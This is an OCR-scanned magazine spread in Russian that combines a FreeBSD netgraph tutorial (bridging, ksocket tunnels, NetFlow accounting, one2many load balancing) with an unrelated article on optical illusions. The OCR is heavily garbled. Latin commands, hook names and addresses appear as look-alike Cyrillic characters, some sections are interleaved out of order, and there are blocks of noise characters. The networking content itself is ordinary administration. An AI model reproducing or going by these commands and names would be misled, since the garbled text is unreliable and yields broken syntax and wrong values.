Многие программы завязаны на пеІдгарЬ. Например, реализация РРР для 
РгееВ50МР0( трсІ.вЕпеі ] использует интерфейс пеІдгарИ, благодаря чему 



большинство операций выполняется на уровне ядра системы и,темсамым, 
повышается скорость работы. 

Несмотря на то, что сегодня насчитывается уже шесть десятков узлов, 
нормальная документация по использованию пеІдгарЬ отсутствует. Можно 
отметить несколько устаревший документ «АІІаЬоиі МеідгарЬ» (русский 
перевод находится по адресу сіІгіп.ги/сІаетоппеѵѵз/пеІагарЬ.ЫтІ І. напи- 
санный разработчиками. В нем рассказано об общих принципах работы и 
дано несколько примеров, но его чтение хоть и дает некоторое понимание 
процесса, в конкретной ситуации помочь не сможет. В итоге остается 
справочная страница пе1;дгарЬ(4) и связанные с ним тап’ы, описывающие 
особенности узлов, плюс несколько примеров в /изг/зііаге/ехатріез/ 
пеОдгарІі. 

ПОДДЕРЖКА ЯДРОМ 

Как правило, специально включать поддержку пеІдгарЬ в ядре нетребу- 
ется. Все необходимое доступно в виде модулей ( в чем можно убедиться 
во время работы того же МРВ при помощи команды /зЬіп/кІсізЦас). 
Просмотреть все имеющиеся КЕВ-модули узлов можно, введя команду: 

# 1з /ЬооО/кегпе1/пд_* . ко 

Сюда же относится модуль пеСдгарк. ко, который является основным. 
При пересборке ядра следует включить группу параметров: 

# дгер ЫЕТСКАРН /изг/згс/зуз/сопб/ШТЕЗ 

оркіопз ЕЕТСКАРН # поддержка пекдгарк 
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Каждый узел пеІдгарИ может адресоваться при помощи абсолютного или 
относительного адреса. Абсолютный адрес получается из имени узла или 
его Ю. Еслиузел сопоставлен с устройством, то обычно их имена совпадают. 
В этом случае для адресации используется адрес, состоящий из имени 
устройства и двоеточия. Например, устройству ^хрО будет сопоставлен узел 
і^хрО, к которому следует обращаться, введя «^хрО:». К имени узла можно 
добавлятьсвязанные крючки: 

бхрО : Ііоокі . ]тоок2 

Адрес вроде «.:» или «.» всегда показывает на локальный узел. Как в имени 
хука, таки в имениузла использоватьзнакточки и двоеточия по понятным 
причинам запрещено. Если узел не получил имя, к нему можно обратиться, 
используя его уникальный номер Ю, заключенный в квадратные скобки. 
Например, к Ю 00000002 можно обратиться так — «[00000002]:». 

Каждый хуктакже имеетуникальное имя, отражающее его цель и ис- 
пользующееся только в контексте данного узла. Поэтому на разныхузлах 
можно создавать крючки с одинаковым названием. Для некоторых типов 
[например, квоскеів] формат имени не может быть произвольным и стро- 
го определен. Относительный адрес состоиттолько из имен хуков. 
Отметим еще один важный момент. На сегодня существует 1 бтипов узлов 
со своими характеристиками и, соответственно, назначениями. Изучив 
особенности каждого типа, легко выбрать узел для решения конкретной 
задачи. К примеру, тип узла есЬо всегда принимает подключения через 
любой хук. Полученный пакет просто отправляется назад в виде ответа. 
Такойтип узла полезен при отладке. Теперь посмотрим описаниеузла 
пд_е1;Ьег — «ЕШегпе! пеІдгарЬ посіеіуре». Тип ЕШегпе! означает, что узел 
фактически является пеІдгарИ-копией физического интерфейса ЕШегпе! 
с возможностью перехватывать и отправлять фреймы с этого интерфейса. 
Его можно использовать для реализации РРР поверх ЕіЬегпеІ [РРРоЕІ.Узел 
состоит изтрех хуков: [оѵѵег[или сііѵегі], ирреги огрЬапв, которые отвечают 
за определенный уровень работы. Или другой узел — пд_ЬгісІде — «ЕШегпе! 
Ьгісідіпд пеІдгарЬ побе Іуре». Нетрудно догадаться, что этоттип позволяет 
организовать сетевой мост на ЕіИегпеІ-интерфейсе. 

У каждого типа и конкретного модуля может быть множество параметров 
и настроек. Поэтомууправление реализовано посредством специальных 
команд. Такиеуправляющиесообщенияделятся на основные, поддержи- 
ваемые всеми модулями [определены в пекдгар]т/пд_теззаде . к], и 
индивидуальные — полное их описание естьтолько в конкретном гшап 
[иногда оно недостоверное]. 

ВИРТУАЛЬНЫЙ СВИЧ 

Раз уже начали с узла пд_Ьгібде,то разберем его в работе, соединив при 
помощи виртуального свича несколько ЕіИегпеІ-сетей. В /изг/зкаге/ 
ехатрІез/пеСдгарк/еккег . Ьгісіде находится скрипт, который можно 
использовать в качестве примера, а после некоторой доводки — и для орга- 
низации подобной функции. Кстати, если настройки выполняются удаленно 
через 55Н, то после выполнения ряда команд соединение может прервать- 
ся. Для управления пеІдгарЬ применяются двеутилиты: пдски пдЬоок. 
Первая более функциональна, поэтому в дальнейшем будем использовать 
именно ее. Для начала проверим, какие узлы уже созданы в системе: 

# пдсРІ ІізР 

Ткеге аге 1 РоРаІ покез : 

Ыате: пдсРІ850 Туре: зоскеР ІВ: 00000001 Ыит коокз : 0 
В списке нет нужных нам узлов, поэтому загружаем модули вручную: 

# кікіоасі -V пд_еРкег 

коакесі пд_еРкег, ік=5 



.1 ььн ^ щ рі ц ,> Р4 _р 4- ^ I м 14 

ІІ чяЧотіЛ 

іІІкчЬНЬішІ.'гч|_ІѵЕ .кдр 

/ Ь» Е И кпн I ^ гнЬ . йн . I 

^ Ьм Е Дн ■■ I ,і . к» 

Ш#.1а ■ 

. 1 .1 I "Т 

^аьлнишІ|>п^_^мсБйіТ. иі.л^кн-і 
«ЧЕ ЦІ І І.Ц. -1 1 

-яікж.Ьа 
; Рлтн I ^ 1 ш . М 

ірффЕ^Ьп_|.^Р||^^Г.-И--І- 



Для работы пеІдгарЬ пересборка ядра не требуется 



# кікіоак -V пд_Ьг1кде 
коакек пд_Ьгікде, ік=б 



Проверяем: 



# кІкзРаР 

Ік КеРз Аккгезз Зіге Вате 



3 1 0хс3574000 4000 пд_зоскеР.ко 

4 3 0хс3578000 ЬООО пеРдгарк.ко 

5 1 ОхсЗБакООО 4000 пд_еРкег.ко 

6 1 ОхсЗБЫООО 4000 пд_Ьгікде.ко 



Для автоматической загрузки добавляем в /ЬооР/Іоакег . сопР следую- 
щие строки: 



$ зисіо ѵі /ЬооіДоасІег.соп^ 

пеРдгарк_1оак= " УЕЗ " 
пд_еРкег_1оак= " УЕЗ " 
пд_Ьгікде_1оак= " УЕЗ " 



Теперьснова смотрим списокузлов: 



# пдсРІ ІізР 

Ткеге аге 3 РоРаІ покез : 

Вате: пдсРІ8бЗ Туре: зоскеР ІВ: 00000004 Ыит коокз : 0 
Ыате: 1е1 Туре: еРкег ІВ: 00000003 Вит коокз : 0 
Ыате: ІеО Туре: еРкег ІВ: 00000002 Вит коокз : 0 



Если мы введем «іРсопРід | дгер 1е», то обнаружим, что имена 
ЕіЬегпеІ-интерфейсов совпадают именем побез [то есть, [еО и [е1 ]. Создаем 
бридж и подключаем его хуком [іпкО к [еО на нижнем [[оѵѵег] уровне. 



# пдсРІ ткреег ІеО: Ьгікде Іоѵ^ег ІіпкО 



Параметр пате команды пдск позволяет дать имя созданномуузлу: 



# пдсРІ пате 1е0:1оѵ^ег ЬпеРО 



Заметил, что к узлу обращаемся по имени «[еО: [оѵѵег», а к созданномуузлу 
ЬпеШ — «ЬпеШ:»? Вывод «пдск [[в!» должен показать наличие нового узла с 
именем ЬпеШ и типом Ьгібде. Собираем все в кучу [[еО и [ІпкО использовать 
нельзя, так как они уже задействованы): 



# пдсРІ соппесР 1е1 : ЬпеРО: Іоѵ^ег Ііпкі 




кр. 

^гщ_т?р-гм 

Р І ■ 

/Б4|_МЕЕ^ййі.и 

■■г^иі " мі-к* 

-ІУР- 

,‘гц_рі9Н.Ьі 
/ Г^_Р І#фЧ . 1» . 1^^ I ■ 
^г^гГсЕЧМі. кЕ- 

11 і\ны:ііі 

^ П| . . і»_ I р 




ХАКЕР 09 /117/ 08 



► 141 





Аналогично, используя крючки 1іпк2 и ІіпкЗ, соединяем Іе* с ЬпеШ по верх- 
нему уровню: 

# пдсОІ соппесС ІеО: ЬпеОО: иррег 1іпк2 

# пдсРІ соппесР 1е1: ЬпеРО: иррег ІіпкЗ 



Активируем на сетевых картах неразборчивый режим, отправив сообще- 
ние зеіргогпізс с любым ненулевым значением (все сообщения описаны в 
пд_еіЬег(4)): 



# пдскі тзд ІеО: зеСрготізс 1 

# пдсСІ тзд 1е1 : зеірготізс 1 



Запрещаем модификацию исходного ЕіЬегпеІ-адреса принятого фрей- 
ма — иначе исходный адрес будет переписан на адрес получившего его 
интерфейса: 



# пдсСІ тзд ІеО: зеіаиСозгс О 

# пдсСІ тзд 1е1 : зеіаиСозгс О 

Мост готов. Для удобства все эти команды лучше записать в файл, который 
выполняется во время загрузки системы. Прижелании можнообеспе- 
чить фильтрацию пакетов. Для этого в пеІдгарЬ есть два модуля: пд_Ьр^и 
пд_ір1'\/ѵ, реализующие возможности соответствующих пакетных фильтров. 

СОЕДИНЕНИЕ НЕСКОЛЬКИХ СЕТЕЙ 

В предыдущем примере мы получили аналогстандартного «Ьгісіде_ 

1оасі= "УЕЗ"». Возможности подсистемы значительно шире. Попробуй в 
стандартном случае добавить (при помощи пек . Ііпк. еккег .Ьгісіде . 
сопіід) третий ЕіЬегпеІ-интерфейс или соединить удаленные сети в одну 
виртуальную, и ты столкнешься с кучей проблем. Можетбыть, даже придется 
прибегнуть к построению целой схемы использования виртуальных интер- 
фейсов, ѴРМ -сетей ит.д. Апри использовании пеІдгарЬ для подключения 
третьего ЕіЬегпеІ достаточно добавить несколько строчек, взяв за образец 
подключение Іеі в нашем примере. Если же необходимо подключить уда- 
ленную сеть в единый виртуальный свич, то порядок действий будет иным. 

И здесь применение пеІдгарЬуже не покажется таким сложным (возможно, 
несколько запутанным, но это только на первый взгляд). 

Настроимузел квоскеі (кегпеівоскеі), способный оперировать ЕІВР-тун- 
нелями, и подключим его к созданному ранееузлу ЬпеШ (модульядра 
пд_кзоске1 в этом случае стартует автоматически). Имя хука должно быть 
вида «ШтіІуАуре/ргоШ» (значения параметров доступны в зоскек (2 ) ): 

# пдскі ткреег ЬпекО: кзоскек 1іпк4 іпек/сідгат/исір 

Отправляем сообщение узлу ЬпеШ:Ііпк4 (к которому подключен квоскеі), 
чтобы он создал сокет, куда будут поступать данные с внешнего ІР-адреса 
(пусть адрес будет 1 .2.3.4, портвыберем произвольный, выше 1024): 

# пдскі тзд ЬпекО : 1іпк4 ЬіпЬ іпек/1 .2.3.4: 1111 




[При пересборке ядра не забудь включить опции МЕТОРАРН) 

ПОДСЧЕТ ТРАФИКА 

К пеІдгарЬ часто обращаются из-за необходимости подсчета трафика. 
Получать статистику можно, задействуя различные модули. Например, 
«врежем» модуль пд_1ее в ІеО между Іоѵѵег и иррегуровнями ЕіЬегпеІ- 
интерфейса. Этот модуль имееттакую же функциональность, как и 
стандартная утилита Іее, дублирующая ввод. Вручную загружать его не 
требуется, ядро делает это автоматически при первом к нему обра- 
щении. Крючки гідЫ; и ІеЬ являются стандартными для этого модуля и 
показывают, с какой стороны мы его подключаем (подробности в «тап 
4 пд_Ше»). 

# пдскі ткреег ІеО: кее Іоѵ/ег гідЬк 

# пдскі пате 1е0:1оѵ7ег 1е0_кее 

# пдскі соппеск ІеО: Іоѵ/ег иррег Іекк 

Чтобы получить статистику, нужно отправить сообщение деШІаШ: 

# пдскі тзд ІеО : 1оѵ\?ег декзкакз 

# пдскі тзд 1е0:иррег декзкакз 

Более подробную информацию о проходящем трафике способен показать 
узел пд_пеШоѵѵ(4). Итоговая информация экспортируется в виде, совмес- 
тимом с популярным протоколом МеіЕІоѵѵ компании Сівсо. Поэтому для ее 
анализа можно использовать любой коллектор, поддерживающий этот 
протокол. Кстати, кроме пд_пеШоѵѵ, есть еще пд_ірасс1, но он не входит в 
стандартную поставку, а последняя версия на сайте кр.ѵѵирру.пекги/риЬ/ 
ЕгееВ5Р/[оса[/кегпе[/пд ірассі датирована декабрем 2006 года (а значит, 
не будем на нем останавливаться). Существует несколько схем подключе- 
ния пд_пеШоѵѵ. Разберем одну из них. Начинаем: 

# пдскі ткреег ІеО: кее 1оѵ7ег Іекк 

# пдскі соппеск ІеО: ІеО : 1оѵ\?ег иррег гідЬк 




На другом сервере повторяем эти настройки, только указываем свой ІР- 
адрес (имена могут отличаться): 



Создаем тапу-узел при помощи пд_опе2тапу(подробнее об этом типе узла 
читай ниже, в разделе «Балансировка нагрузки») и подключаемся к нему: 



зегѵег2# пдскі тзд ЬпекО : ІіпкО ЫпЬ іпек/2 .3.4.5:2222 

И подключаемся к удален ному сокету: 

# пдскі тзд ЬпекО : 1іпк4 соппеск іпек/2 .3.4.5: 2222 
зегѵег2# пдскі тзд ЬпекО : ІіпкО соппеск іпек/1 .2.3.4: 1111 



# пдскі ткреег ІеО : 1оѵ\?ег опе2тапу 1екк2гідЬк тапуО 

# пдскі соппеск ІеО : Іоѵ/ег . 1екк2г1дЬк гідЬк21екк тапуі 

Даем имя о2т узлу [еО:[о\л/ег.гідЫ2[еЬ: 

# пдскі пате ІеО : Іоѵ/ег . гідЬк21екк о2т 



Теперь локальные и удаленная сети соединены в одну при помощи вирту- Создаем на о2т узел типа пеШоѵѵс именем пеШоѵѵ: 
ального свича, причем без использования ѴРМ. 

# пдскі ткреег о2т: пеккіоѵ^ опе ікасеО 
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9агр)шаем нужные модули 




# пдсОІ пате о2т:опе пе1::Е1оѵ\? 

И узел кзоскеі на «пеіНоѵѵ:» для экспорта: 

# пдсОІ ткреег пеО:Е1оѵ^: кзоскеО ехрогк іпек/сідгат/исір 

# пдсСІ тзд пеСіЕІоѵ/: ехрогС соппесС 
іпек/ 192 .168.1.100:1111 

Для проверки вводим «пдсИ Ііві». Если модули загружены, запрашиваем 
таблицу подключений пеі^іоѵѵ: 

# пдсСІ з]тоѵ\? пеСІ1оѵ\[ 

Далееустанавливаем одну из утилит-коллекторов. Список некоторых кол- 
лекторов приведен на странице \л/\л/ѵѵ.с5е.\л/и5и.есІи/~с55/567Лгакіс . Поиск 
в портах РгееВЗО также даст нужный результат: 

$ ссі /изг/рогСз/ 

$ таке зеагск кеу=пеСІ1оѵ\? 

Например, выбираем коѵѵ-іооів: 

# ссі /изг/рогРз/пек-тдтк/11оѵ^-коо1з 

# таке іпзСаІІ 

Захватываем пакеты с созданного сокета (подробная документация і^іоѵѵ- 
І00І5 есть на сайте ѵѵѵѵѵѵ.зрІіпІегеб.пеі/зѵѵЛіоѵѵ-ІооІз/босз/ ]: 

# тксііг /ѵаг/пек11оѵ^з 

# /изг/1оса1/Ып/11оѵ7-сарСиге -р \ 

/ѵаг/гип/11оѵ\?-сар1:иге.рі(і -п 24 -Ы 0 \ 

-Ѵ7 /ѵаг/пеСІ1оѵ7з/ \ 

-3 0/192.168.1.100/1111 

После этого в каталог /ѵаг/пек11оѵ^з будет складываться захва- 
ченная статистика; каждый час будет создаваться новый (файл (-п 24). 
Файлы имеют бинарный формат, поэтому для просмотра используем 
специальные утилиты из комплекта Лоѵѵ-Іооів. Ключ ' -1 ' указывает 
на формат вывода, призначении 10 будет выведен адрес источника и 
назначения. Ключ '-5' отвечает за поле сортировки: 

# /изг/1оса1/Ып/11оѵ7-са1: -р /ѵаг/пек11оѵ7з/ I \ 

/изг/1оса1/Ып/11оѵ7-з1:аЦ -110 -34 -Р 

БАЛАНСИРОВКА НАГРУЗКИ 

Стоитупомянуть еще об одном интересном модуле — пд_опе2тапу. Этот 



узел позволяет объединить несколько интерфейсов по принципу «один 
ко многим» (ил и «многие к одному»). На один из интерфейсов, который 
объявляется как опе, перенаправляются все тапу-интерфейсы; входя- 
щие пакеты собираются в опе. 

Подробности настройки с примером приведены на тап-странице пд_ 
опе2тапу(4), а перевод лежит на ѵѵѵѵѵѵ.ореппекги/Ьаве/пеІі/пд опе2тапѵ. 
Ш.ЫтІ . 

С помощью пд_опе2тапу можно объединить несколько сетевых ин- 
терфейсов (например, подключенных к разным провайдерам) в один 
узел, и трафик будет равномерно распределяться между интерфейсами. 
Для распределения нагрузки используется гоипб-гоЬіп алгоритм. Как 
вариант, предлагается дублирование пакетов от опе на все та пу- ин- 
терфейсы. К сожалению, пока он еще недостаточно хорошо опреде- 
ляет работоспособность канала, поэтому использовать его следует с 
осторожностью. 

Итак, объявляем ІеО какопе: 

# пдсИ ткреег ІеО: опе2тапу иррег опе 

# пдскі соппесС ІеО: ІеО: иррег 1оъ?ег тапуО 

# пдсіі соппеск 1е1 : 1е0:иррег 1оъ?ег тапуі 

Тоже самое — с остальными интерфейсами. Переводим их в рготівсиоив и 
запрещаем модификацию: 

# пдскі тзд 1е1 : зекрготізс 1 

# пдскі тзд 1е1 : зекаикозгс 0 

Настраиваем все тапу интерфейсы. Значение «1 » должно соответствовать 
числу интерфейсов: 

# пдскі тзд 1хр0:иррег зексопіід "{ хтікАІд=1 1аіІАІд=1 \ 

епаЫесіЫпкз= [11] } " 

И — поднимаем ІеО: 

# іісопіід ІхрО 192.168.1.1 пектазк 0x1111111с 

С этого момента ширина полосы, обеспечиваемая виртуальным интерфей- 
сом, увеличилась. 

СОБЕРИ МОЗАИКУ 

Наличие большого количества модулей пеІдгарЬ позволяет реализовывать 
действительноуникальные функции, складывая узлы, как мозаику, в любой 
комбинации, врезая при необходимости новыеузлы или делая ответвле- 
ния. Но, ксожалению, отсутствие полноценной документации существенно 
усложняет изучение пеІдгарЬ. 
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СЕБЯ САМ 
В ОКЕАНЕ БЕЗУМИЯ 




чНИТЬ АРИАДНЫ В ЛАБИРИНТЕ ОПТИЧЕСКИХ ИЛЛЮЗИИ 



Мир, который мы видим, и мир, существующий на самом деле, это две боль- 
шие разницы. Обманы зрения встречаются на каждом шагу, искажая наше 
восприятие. Чтобы не попасться на умелые манипуляции, взятые на воору- 
жение художниками, архитекторами, модельерами и рекламистами, 
и попутно научиться обманывать других, достаточно разобраться в основах 
психологии восприятия. 



Н ОРГАНЫ ЧУВСТВ НЕ ЛГУТ 

«Обман зрения» — всего лишь словесная метафора. Правильнее 
было бы говорить об ошибках интерпретирования информации, 
полученной рецепторами и вступающей в сложные биохимические, 
электрические и психологические взаимодействия с полушариями 
головного мозга. Универсальных оптических иллюзий не сущест- 
вует, — все они тесно связаны с жизненным опытом, культурным 
наследием и прочими факторами. 

Но железные дороги и авиатрассы взорвали границы, и мир пре- 
вратился в огромный муравейник. Восток потянулся к западу, запад 
к востоку. Культурные особенности и национальная самобытность 
в скором времени рискуют стать достоянием истории. Хорошо это 
или плохо — нас сейчас не интересует. Важно, что единый культур- 
ный фундамент оказывается надежной платформой для создания 
направленных зрительных иллюзий, искажающих действительность 
самым дешевым путем — прямым воздействием на сознание. 



Н ОБМАНЫ ЗРЕНИЯ ОТ А ДО Я 

В древние времена иллюзиями развлекались в основном художники 
да архитекторы. Достаточно сказать, что падение Пизанской башни 
на 90% обусловлено обманом зрения и только на 1 0% — актуальным 
углом наклона. Леонардо да Винчи не только рисовал картины с 
«подвохом», НОИ настрочил несколько трактатов об особенностях 
восприятия, однако тогда они остались незамеченными. Впрочем, 
если копнуть глубже, выяснится, что оптические иллюзии активно 
использовались еще жрецами и другими религиозными деятелями, 
демонстрирующими ауру и прочие «тонкие» душевные материи. 

С началом научно-технической революции за обманы зрения взя- 
лись психологи. Ничего незнаяо функциях мозга (о нихи сейчас 
известно немного), двигаясь в кромешной тьме, они ухватились 
за оптические иллюзии, словно за нить Ариадны, дающую ключ 
к пониманию основных процессов психофизики восприятия и 
интерпретации изображений. 
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Рисунок 1 : вращающиеся круги| 
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Сегодня открыты свыше сотни разновидностей обманов зрения, и что- 
бы не запутаться в этом зоопарке, принято делить их натри корзины. 

В первую (самую большую) попадают вполне «натуральные» иллюзии, 
из-за которых мы видим предмет нетаким, какой он есть в действи- 
тельности (видим с искажением, не видим то, что есть, или, напротив, 
видим то, чего нет]. Во второй (также довольно вместительной) ока- 
зываются эффекты, вызванные адаптивными особенностями нашего 
восприятия. Сюда попадают игры с яркостью, контрастностью, цветами 
и т.д. Третья корзина хранит оптические обманы, вызванные «познава- 
тельными» (когнитивными) способностями нашего мозга, пропускаю- 
щего всю поступающую информацию через призмужизненного опыта, 
и потому на одной итой же картинке разные люди видят совершенно 
противоположные вещи и бесполезно спорить, кто из них прав. 
Существует и другая классификация, выделяющая следующие типы 
обманов зрения: иллюзии восприятия размера, иллюзии соотноше- 
ния фигуры и фона, иллюзии цвета и контраста, иллюзии восприятия 
глубины, иллюзии движения, эффект перцептивной готовности, 
эффект последействия, парейдолические иллюзии, кажущиеся 
фигуры, невозможные фигуры (уже рассмотренные нами в одном из 
прошлых выпусков Рвусбо). И еще куча других эффектов, которые 
совершенно невозможно втиснуть в рамки журнальной статьи. Поэ- 
тому мы решили отобрать только самые интересные, а остальные вы- 
несли в ссылки, по которым настоятельно рекомендуется пройтись, 
ибо там действительно есть, на что посмотреть. 



Взаимодействие центрального и периферического зрения также 
способно вызывать различные иллюзии, которые легко продемонст- 
рировать на примере... кофейных зерен, расположенных опреде- 
ленным образом (смотри рисунок2). Создается впечатление, что 
рисунок «дышит», совершая волнообразные колебания, существую- 
щиетолько в нашем сознании. 

В СЛЕПОЙ ГЛУХОМУ НЕ ТОВАРИЩ 

Как известно из школьного курса анатомии, в глазу каждого челове- 
ка есть та к называемое «слепое пятно» — область на сетчатке, через 
которую выходит зрительный нерв, препятствующий образованию 
светочувствительных окончаний. В обычной жизни слепое пятно 
незаметно тебе по двум причинам: а) мы просто привыкли кнемуи 
не воспринимаем на сознательном уровне; б) слепые пятна правого 
и левого глаза расположены в разных местах — а за счет перекрытия 
таких противоречивых данных мозг восстанавливает до 99% про- 
центов потерянной информации. Приведенная цифра, естественно, 
условна и срабатывает не всегда. На рисунке 3 изображен диф- 
фузный круг с красной точкой в центре, сосредоточив внимание на 
которой, мы через десято к-д ругой секунд с удивлением обнаружим, 
что круг... в буквальном смысле слова тает, сливаясь с окружающим 
фоном, и, наконец, полностью исчезает. Какэто можно использовать 
для введения легковерных людей в заблуждение, надеюсь, подска- 
зывать не надо? Особенно, если вдоль круга нанести магическую 
символику, зажечь свечи и нараспев произнести заклинания... 



г иллюзии ДВИЖЕНИЯ 

Двигать изображения научились еще в каменном веке. Рисунок 1 
— наглядное тому подтверждение. Круги, нарисованные на бумаге, 
вращаются! Медленно, но вращаются! 

Эффект усиливается, если рассматривать изображение с неболь- 
шого расстояния: так, чтобы картинка занимала все поле зрения, 
и тогда за счет направленно го движения глаза и перспективных 
ошибок восприятия возникает удивительный эффект, ослабляю- 
щийся по мере того, как ты отодвигаешь голову от изображения. 
Когда глаз (а точнее, центральное поле зрения) уже в состоянии 
охватить всю картинку целиком, то он никуда не движется, и круги 
не вращаются. А если вращаются, значит, пациент под кайфом или 
слегка пригубил, а потом усугубил, в результате чего по телу про- 
катилась приятная волна расслабления, и движение глаз приняло 
хаотичный характер. 



г иллюзии КОНТРАСТАр ЦВЕТА и ФОНА 

Все. Сейчас автора будут бить. Потому что он скажетто, во что 
здравый смысл категорически оказывается верить. Ведь признать, 
что поля А и В, изображенные на рисунке 4, в действительности 
совершенно идентичны по яркости и цвету — это же просто крышу 
сорвать можно! 

Компьютерный вариантэтого изображения ( еп.ѵѵікіресііа.огд/ѵѵікі/ 
Ігладе:6геѵ здиаге оріісаі іиизіоп.РМС ) производит намного более 
сильное впечатление, поскольку в любую секунду в оба квадрата 
можно ткнуть «пипеткой» и убедиться, что они одинаковые. 

А все потому, что понятие яркости, с точки зрения мозга, сугубо 
локально. Мозг оперирует отнюдь не абсолютными величинами, а 
относительными, сравнивая яркость всякой заданной точки с окру- 
жающими ее объектами. Фотографы, художники, скульпторы и другие 
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исунокЗ: исчезающий круг 
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?исунок8: какоі^ 




Символ изобра^ 


АВС 


Кен в центреТ”^ 
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> ІП^О 

• Хотя Пизанская 
башня наклонена, ко- 
локольня, построенная 



во второй половинеХІѴ 
века наверху башни, 
стоит ровно. 



Рисунок4: поля А и В на самом делеі 
Еовер шенно идентичны по яркости Г 
и цвец^ 



• Парейдолические 
иллюзии — это иллю- 
зорное восприятие 
реального объекта. 
Парейдолии возни- 
каютпри восприятии 
самых обычных 
объектов. Например, 
при рассматривании 
рисунка обоев или 
ковра, трещин и пятен 
на потолке можно 
внезапноувидеть из- 
менчивые, фантасти- 
ческие пейзажи, лица 
людей, необычных 
зверей ит.п. 

• Нить Ариадны — 

вдревнегреческой ми- 
фологии нить, которая 
помогла афинскому 
герою Тесею выйти из 
лабиринта Мино- 
тавра. В переносном 
смысле — это способ, 
помогающий выйти 
из затруднительного 
положения; путевод- 
ная нить. 



деятели искусства уже давно это просекли. То же относит- 
ся и к программистам, которые работали на динозаврах 
машинной эры. Зажатые ограниченной цветовой палит- 
рой (представленной в те времена оттенками серого), они 
создавали удивительные демки, используя особенности 
психофизики восприятия. Сейчасэто, конечно, нетак 
актуально, но по-прежнему очень интересно. 

В ЭФФЕКТ ПОСЛЕДЕЙСТВИЯ 

Считается, что мозгудерживает изображение порядка 
1/24 секунды. Отсюда, дескать, и пошли 24 кадра в секунду 
в кинематографе. Спору нет, все верно. А правда ли, что 
Иванов выиграл в лотерею «Жигули»? Правда. Толь- 
ко не Иванов, а Козлов. И не в лотерею, а в карты. И не 
«Жигули», а 1 00 рублей. И не выиграл, а проиграл. Вот та к 
и тут. Прославленные 24 кадра появилисьтолько в зрелом 
кинематографе, когда упалиценынапленку— ипопричи- 
нам, совершенно отличным от психофизики восприятия. 
Просто, чем больше кадров в секунду, тем больше фаз 
движения способна запечатлеть камера, хотя в фильмах 
с драками даже 60 полукадров МТЗС-стандарта уже не 
хватает и приходится снимать на повышенной скорости, 
а затем вручную набирать пакет кадров, захватывающих 
максимальное количество фаз движения. 

Возвращаясь ктеме разговора, отметим, что мозгудер- 
живает изображение довольно продолжительное время 
(десятки секунд). И сейчас мы это проверим. Если с 
минуту втыкать в негативный портрет Че Гевары (рисунок 
5 ), а потом перевести взгляд на белый фон, то на нем 



возникнет вполне позитивное изображение и не только 
возникнет, но еще и не захочетуходить. 

Н ИЛЛЮЗИИ ГЛУБИНЫ ПРОСТРАНСТВА 

Кафельный пол римского собора имени Святого Иоанна 
Латеранского («подложка» статьи) вымощен плоской 
плиткой, которая за счет ошибочно выбранной схемы 
интерпретации двумерного изображения воспринима- 
ется мозгом как нагромождение трехмерных кирпичи- 
ков. Кстати говоря, это явление встречается на практике 
повсеместно, поскольку нещадно эксплуатируется 
художниками и дизайнерами (ведь им тесно в застенках 
плоской поверхности, с которой они вынуждены рабо- 
тать — будь то холст, экран монитора или еще что). 

г ИЛЛЮЗИЯ ЦЕНОЙ В МИЛЛИОН ДОЛЛАРОВ 

А ведь как все хорошо начиналось! Запустили ученые 
вокруг Марса всякие спутники и стали его снимать. Вот 
и сняли. Плохой камерой с низким разрешением. Такое 
сняли, что и сами не рады. Человеческое лицо в стиле 
маски фараона на поверхности соседней планеты (ри- 
сунок?), представляющее собой колоссальное сооруже- 
ние, воздвигнутое то ли марсианами, то лиеще каки ми 
инопланетными существами. 

«Фараон» прорисовывается вполне отчетливо, и публика 
(на деньги которой, собранные в виде налогов, и строится 
вся космическая техника) рвет и мечет, требуя развернуть 
остальные спутники, оснащенные камерами высокого 
разрешения, и заснять сенсацию во всех подробностях. 
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Интересные ссытлси 

• Оріісаі і11и8Іоп8 (отправная точка путешествия в неизве- 
данный мир на Вике, естественно, на английском, поскольку 
русский раздел чудовищно неполон и пополняться не собира- 
ется) : 



V 



■ . 1 - а . .1 

Рисунок?: «фараон» на поверхности Мар^ 



сотни. Увидеть их можно, как правило, только однажды. Слегка другой 
угол падения света — и все, изображение исчезает. Снимать его еще 
раз — бессмысленно, да и накладно. Разворотспутника — серьезная 
инженерная операция, которая в случае ошибки оператора рискует 
закончиться полным крахом. Да даже без всякого краха — количество 
топлива маневровых двигателей ограничено и невосполнимо, а потому 
расходовать его следует очень бережно. Воттолько... кому это объяс- 
нишь... Ну, отсняло МАСАеще серию снимков этого «искусственного со- 
оружения внеземных существ». Что толку? Все равно общественность 
уверена, что МА5А прячет марсиан на секретной военной базе. 



Н ЭФФЕКТ ПЕРЦЕПТИВНОЙ ГОТОВНОСТИ 

Или неготовности. Это как посмотреть. Мы видим в первую очередь 
то, что хотим или ожидаем увидеть. 

Обратим свой взор на рисунокВ и попробуем ответить: какой символ 
изображен в центре — буква «В» или число «1 3»? Зависит оттого, в 
каком направлении читать. Психологические учебники буквально 
кишат примерами подобного рода, часть из которых явно надумана, 
а часть — позаимствована из реальных текстов, сложность распоз- 
навания которых имеет фундаментальную природу. 

Человек распознает текст в контексте окружающих символов. Машина 
же — думать не обучена, а шаблонные методы, увы, во многих случаях 
не работают. Кстати, вместо того, чтобы делать каптчи на рваном 
цветом фоне, который даже нормального человека приводит в ярость, 
граничащую с суицидом (что же говорить о людях с ограниченными 
возможностями?), давно пора задействовать чисто психологические 
эффекты, использовав такое начертание шрифта, которое только 
человек способен проинтерпретировать единственно правильным 
образом (фактически, это тест на Ю — даны: ушанка, валенки и мили- 
цейская фуражка. Вопрос: какой из предметов здесь лишний? Ответ 
— фуражка, потому что валенки и ушанку нормальные люди носят). 



Специалисты из МАЗАсначала игнорировали общественное мнение, а 
когда оно приняло характер планетарных масштабов, уже поздно было 
доказывать, что «фараон» — всего лишь внебрачный ребенок игры 
света и тени. Таких «фараонов» на Марсе ина Луне — десятки, а то и 



ІРисунокб: негативный портретЧе Геварытрансформируется в созна- 
|нии в позитивное изображение 



• Парадоксы восприятия. Зрительные иллюзии и феномены 
(большая коллекция картинок, демонстрирзнощих различные 
оптические иллюзии с краткими пояснениями на русском 
языке) : 

йін.на8Ьса1:.ги /і11и8Іон8. і11и8Іон.1:иг І8І:.Ьу /шаін /інйех /інйех. 
рЬ р. ѵѵѵѵѵѵ.р8у.т8и.ги/і11и8Іон/. ѵѵѵѵѵѵ.8согс1іег.ги/неиго/неиго 
8Ѵ8/і11и8Іон2.р1ір. ѵѵѵѵѵѵ.кгот8Ь.ін(^о/інйех.рЬр?ор1:іон=сот со 
н1:ен1:&1:а8к=ѵіеѵѵ&ісі= 118&І1:етШ=82 

